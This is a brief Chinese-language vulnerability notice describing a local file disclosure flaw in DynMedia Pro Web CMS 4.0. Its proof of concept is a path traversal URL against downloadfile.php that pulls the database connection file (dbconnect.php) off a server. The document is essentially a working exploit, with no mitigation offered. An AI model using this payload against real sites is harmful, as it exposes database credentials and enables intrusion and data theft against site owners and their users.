DynMedia Pro 是一款内容管理系统,DynMedia Pro存在信息泄露漏洞,可能导致远程下载CMS中关键文件(如数据库连接文件)。
[+]info: ~~~~~~~~~ DynMedia Pro Web CMS 4.0 ||Local File Disclosure Exploit
[+]poc: ~~~~~~~~~ [Vulnerable File ] http://www.2cto.com/downloadfile.php?dwnfile=[LFD] [Example ] http://www.2cto.com/downloadfile.php?dwnfile=../library/dbconnect.php |